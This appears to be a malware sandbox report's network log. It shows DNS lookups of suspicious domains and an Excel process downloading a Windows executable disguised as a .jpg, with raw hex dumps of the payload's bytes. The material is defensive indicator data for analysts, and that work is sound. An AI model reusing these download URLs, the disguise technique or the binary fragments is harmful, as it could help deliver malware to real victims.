                                                                                                                                                                                                          Jul 6, 2021 15:47:29.942614079 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.001965046 CEST53597708.8.8.8192.168.2.22

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.182982922 CEST192.168.2.228.8.8.80xb648Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.416810989 CEST192.168.2.228.8.8.80x5cf2Standard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.640605927 CEST192.168.2.228.8.8.80x71ddStandard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.398793936 CEST192.168.2.228.8.8.80x4335Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.495630980 CEST192.168.2.228.8.8.80x63f2Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:22.906333923 CEST192.168.2.228.8.8.80x6e2bStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:22.974003077 CEST192.168.2.228.8.8.80xbb9fStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.835611105 CEST192.168.2.228.8.8.80x7a0aStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.915623903 CEST192.168.2.228.8.8.80xa456Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.036835909 CEST192.168.2.228.8.8.80x1363Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.111284971 CEST192.168.2.228.8.8.80x916aStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.196052074 CEST192.168.2.228.8.8.80xbdabStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.273384094 CEST192.168.2.228.8.8.80x21e6Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.861313105 CEST192.168.2.228.8.8.80xd9fcStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.942614079 CEST192.168.2.228.8.8.80x4936Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.243478060 CEST8.8.8.8192.168.2.220xb648No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.243478060 CEST8.8.8.8192.168.2.220xb648No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.477760077 CEST8.8.8.8192.168.2.220x5cf2No error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.477760077 CEST8.8.8.8192.168.2.220x5cf2No error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.703315973 CEST8.8.8.8192.168.2.220x71ddNo error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.703315973 CEST8.8.8.8192.168.2.220x71ddNo error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.472317934 CEST8.8.8.8192.168.2.220x4335No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.472317934 CEST8.8.8.8192.168.2.220x4335No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.472317934 CEST8.8.8.8192.168.2.220x4335No error (0)dr49lng3n1n2s.cloudfront.net13.225.75.73A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.553438902 CEST8.8.8.8192.168.2.220x63f2No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.553438902 CEST8.8.8.8192.168.2.220x63f2No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.553438902 CEST8.8.8.8192.168.2.220x63f2No error (0)dr49lng3n1n2s.cloudfront.net13.225.75.73A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:22.965862036 CEST8.8.8.8192.168.2.220x6e2bNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:22.965862036 CEST8.8.8.8192.168.2.220x6e2bNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:23.040585995 CEST8.8.8.8192.168.2.220xbb9fNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:23.040585995 CEST8.8.8.8192.168.2.220xbb9fNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.898099899 CEST8.8.8.8192.168.2.220x7a0aNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.898099899 CEST8.8.8.8192.168.2.220x7a0aNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.898099899 CEST8.8.8.8192.168.2.220x7a0aNo error (0)dr49lng3n1n2s.cloudfront.net13.225.75.73A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.969923973 CEST8.8.8.8192.168.2.220xa456No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.969923973 CEST8.8.8.8192.168.2.220xa456No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.969923973 CEST8.8.8.8192.168.2.220xa456No error (0)dr49lng3n1n2s.cloudfront.net13.225.75.73A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.096276999 CEST8.8.8.8192.168.2.220x1363No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.096276999 CEST8.8.8.8192.168.2.220x1363No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.166096926 CEST8.8.8.8192.168.2.220x916aNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.166096926 CEST8.8.8.8192.168.2.220x916aNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.251355886 CEST8.8.8.8192.168.2.220xbdabNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.251355886 CEST8.8.8.8192.168.2.220xbdabNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.251355886 CEST8.8.8.8192.168.2.220xbdabNo error (0)dr49lng3n1n2s.cloudfront.net13.225.75.73A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.328028917 CEST8.8.8.8192.168.2.220x21e6No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.328028917 CEST8.8.8.8192.168.2.220x21e6No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.328028917 CEST8.8.8.8192.168.2.220x21e6No error (0)dr49lng3n1n2s.cloudfront.net13.225.75.73A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.919354916 CEST8.8.8.8192.168.2.220xd9fcNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.919354916 CEST8.8.8.8192.168.2.220xd9fcNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.001965046 CEST8.8.8.8192.168.2.220x4936No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.001965046 CEST8.8.8.8192.168.2.220x4936No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • thousandsyears.download
                                                                                                                                                                                                          • voopeople.fun
                                                                                                                                                                                                          • uppercilio.fun
                                                                                                                                                                                                          • astrocycle.download

                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          0192.168.2.2249165104.21.52.11180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.293735027 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                          Host: thousandsyears.download
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348140001 CEST2INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 06 Jul 2021 13:47:20 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 57856
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                          Age: 6670
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gaVDgy0KW0G3eM%2BWXw7%2BKq7uwkVxeRBXmNvzeHfOiJR81JPQOt%2BkMZi89WwM1Mswma9SV7QUXGpaGDU58NktdKyxVHtgLwmz6ODCUbc2v7TYpJo2W%2FdkTkB8Tk0TGcx7wv8EAuI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 66a948cc0cf505d0-FRA
                                                                                                                                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348165989 CEST3INData Raw: 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: @@
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348182917 CEST4INData Raw: b4 5a f6 89 05 6b dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00
                                                                                                                                                                                                          Data Ascii: Zk$#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@H
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348196983 CEST6INData Raw: 89 84 24 90 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84
                                                                                                                                                                                                          Data Ascii: $H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$l
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348212004 CEST7INData Raw: 00 0f b7 84 24 b2 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00
                                                                                                                                                                                                          Data Ascii: $$D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348227978 CEST8INData Raw: 00 00 00 48 89 74 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24
                                                                                                                                                                                                          Data Ascii: Ht$pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348246098 CEST10INData Raw: 00 00 48 8b 94 24 a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24
                                                                                                                                                                                                          Data Ascii: H$L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLH
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348263025 CEST11INData Raw: 00 00 00 8b 44 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00
                                                                                                                                                                                                          Data Ascii: D$`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348278046 CEST13INData Raw: 86 00 00 00 48 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00
                                                                                                                                                                                                          Data Ascii: HD$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.348293066 CEST14INData Raw: 0f b7 04 4a 44 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe
                                                                                                                                                                                                          Data Ascii: JDDDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.349069118 CEST16INData Raw: 48 8b 4c 24 30 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00
                                                                                                                                                                                                          Data Ascii: HL$0H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          1192.168.2.2249166172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.522022963 CEST63OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                          Host: voopeople.fun
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.581938982 CEST65INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 06 Jul 2021 13:47:20 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 57856
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                          Age: 6669
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VLxfpVyZUGCWZhNkjYjM2dhqB7nvlBANFd5kfSq0gI3q0kVhzLK1Fs5Sbb7mXSadUWV7Nm8pb5flLyj6HrVr4vZxsu5Shr15CPbgy9JtmPqDwX%2FYqgPogDwLXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 66a948cd7e774e2b-FRA
                                                                                                                                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.581968069 CEST66INData Raw: 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: @@
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.581984043 CEST67INData Raw: 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00 30 00
                                                                                                                                                                                                          Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582000017 CEST69INData Raw: 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84 24 84
                                                                                                                                                                                                          Data Ascii: IH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hAa
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582020044 CEST70INData Raw: 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0 00 00
                                                                                                                                                                                                          Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582036018 CEST71INData Raw: 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84 24 5c
